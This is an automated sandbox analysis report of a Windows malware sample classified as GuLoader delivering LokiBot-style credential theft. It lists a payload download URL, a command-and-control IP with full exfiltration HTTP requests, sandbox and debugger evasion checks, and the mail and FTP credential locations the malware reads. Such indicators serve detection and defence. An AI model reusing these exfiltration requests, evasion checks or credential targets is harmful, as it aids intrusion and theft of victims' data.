Windows Analysis Report lzJWJgZhPc

Overview

General Information

Sample Name: lzJWJgZhPc (renamed file extension from none to exe)
Analysis ID: 532379
MD5: 46984f492d6314442d1a502d7ab460c4
SHA1: 3515b9159efe0abc0df68d352c4e1bed4391c2fe
SHA256: 4366a0e113d168f2809a4a1983c2198ec874b89af0bdfe465e753d409c85c51c

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • lzJWJgZhPc.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\lzJWJgZhPc.exe" MD5: 46984F492D6314442D1A502D7AB460C4)
    • Form_Sporogeni.exe (PID: 3404 cmdline: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe MD5: 3C6FB2D5CB7A8CCF575C378C5883EAC2)
      • Form_Sporogeni.exe (PID: 1740 cmdline: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe MD5: 3C6FB2D5CB7A8CCF575C378C5883EAC2)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
0000000C.00000000.410653501.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      AV Detection:

      Found malware configuration
      Source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF"}
      Multi AV Scanner detection for submitted file
      Source: lzJWJgZhPc.exe | ReversingLabs: Detection: 39%
      Antivirus detection for URL or domain
      Source: http://63.250.34.171/tickets.php?id=277 | Avira URL Cloud: Label: malware
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Joe Sandbox ML: detected
      Source: lzJWJgZhPc.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknown | HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.180.161:443 -> 192.168.2.3:49760 version: TLS 1.2
      Source: lzJWJgZhPc.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00406873 FindFirstFileW,FindClose,
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040290B FindFirstFileW,

      Networking:

      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49761 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49761 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49762 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49762 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 63.250.34.171:80
      Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 63.250.34.171:80
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF
      Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
      Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox View | IP Address: 63.250.34.171 63.250.34.171
      Source: global traffic | HTTP traffic detected:
        GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: drive.google.com
        Cache-Control: no-cache
      Source: global traffic | HTTP traffic detected:
        GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Cache-Control: no-cache
        Host: doc-00-50-docs.googleusercontent.com
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        POST /tickets.php?id=277 HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 63.250.34.171
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: AA495C78
        Content-Length: 190
        Connection: close
      Source: global traffic | HTTP traffic detected:
        POST /tickets.php?id=277 HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 63.250.34.171
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: AA495C78
        Content-Length: 190
        Connection: close
      Source: global traffic | HTTP traffic detected:
        POST /tickets.php?id=277 HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 63.250.34.171
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: AA495C78
        Content-Length: 163
        Connection: close
      Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 403 Forbidden
        Date: Thu, 02 Dec 2021 06:09:39 GMT
        Server: Apache/2.4.38 (Debian)
        Content-Length: 287
        Connection: close
        Content-Type: text/html; charset=UTF-8
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 403 Forbidden
        Date: Thu, 02 Dec 2021 06:09:43 GMT
        Server: Apache/2.4.38 (Debian)
        Content-Length: 287
        Connection: close
        Content-Type: text/html; charset=UTF-8
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: global traffic | HTTP traffic detected:
        HTTP/1.1 403 Forbidden
        Date: Thu, 02 Dec 2021 06:09:46 GMT
        Server: Apache/2.4.38 (Debian)
        Content-Length: 287
        Connection: close
        Content-Type: text/html; charset=UTF-8
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
      Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171
      Source: Form_Sporogeni.exe, 0000000C.00000002.524923598.000000001E706000.00000004.00000001.sdmp | String found in binary or memory: http://63.250.34.171/tickets.php?id=277
      Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: lzJWJgZhPc.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Form_Sporogeni.exe, 0000000C.00000003.497554994.000000000097A000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524994253.000000001E756000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498697620.0000000000979000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498525929.0000000000977000.00000004.00000001.sdmp | String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/
      Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp | String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idf
      Source: unknown | HTTP traffic detected:
        POST /tickets.php?id=277 HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 63.250.34.171
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: AA495C78
        Content-Length: 190
        Connection: close
      Source: unknown | DNS traffic detected: queries for: drive.google.com
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040755C
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00406D85
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A78B1
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AF4FC
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1B06
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9950
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0D7B
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A3A1A
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1A1E
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A743B
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9E50
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1E7F
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AB8C3
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A32FB
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A3318
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0524
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1B30
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0166
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0564
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0393
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A05AA
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1BC9
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A17CF
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AB5C0
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A55E9
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A19EC
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A78B1 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9950 NtAllocateVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570204 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005703C8 Sleep,NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570212 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005702DD NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005702C4 NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005701CD LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005701CB LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570479 NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570423 NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005703ED NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Process Stats: CPU usage > 98%
      Source: lzJWJgZhPc.exe, 00000001.00000002.299514998.0000000000428000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameForm_Sporogeni.exe vs lzJWJgZhPc.exe
      Source: lzJWJgZhPc.exe, 00000001.00000002.299502964.000000000040F000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameForm_Sporogeni.exe vs lzJWJgZhPc.exe
      Source: Form_Sporogeni.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | File read: C:\Users\user\Desktop\lzJWJgZhPc.exe
      Source: lzJWJgZhPc.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknown | Process created: C:\Users\user\Desktop\lzJWJgZhPc.exe "C:\Users\user\Desktop\lzJWJgZhPc.exe"
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | File created: C:\Users\user\AppData\Local\Temp\nsbD32D.tmp
      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/4@2/3
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_004021AA CoCreateInstance,
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

      Data Obfuscation:

      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000000.410653501.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exeCode function: 6_2_080A12E4 push es; retf
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exeCode function: 6_2_080A12FC push es; retf
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exeCode function: 6_2_080A3B17 push 77CDC3EFh; ret
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exeCode function: 6_2_080A552B push edx; iretd
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exeCode function: 6_2_080A2956 push ecx; retf
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exeFile created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exeFile created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Process information set: NOGPFAULTERRORBOX

      Malware Analysis System Evasion:

      Tries to detect Any.run
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe TID: 5964 | Thread sleep count: 457 > 30
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe TID: 4828 | Thread sleep time: -60000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Last function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Window / User API: threadDelayed 457
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00406873 FindFirstFileW,FindClose,
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040290B FindFirstFileW,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Thread delayed: delay time: 60000
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | System information queried: ModuleInformation
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | API call chain: ExitProcess graph end node
      Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
      Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
      Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
      Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
      Source: Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: vmicvss
      Source: Form_Sporogeni.exe, 0000000C.00000002.524923598.000000001E706000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
      Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
      Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
      Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
      Source: Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat

      Anti Debugging:

      Hides threads from debuggers
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Process token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080ACC64 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080ABEB6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9349 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AA615 LdrInitializeThunk,LoadLibraryA,
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

      Stealing of Sensitive Information:

      GuLoader behavior detected
      Source: Initial file | Signature Results: GuLoader behavior
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
      Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
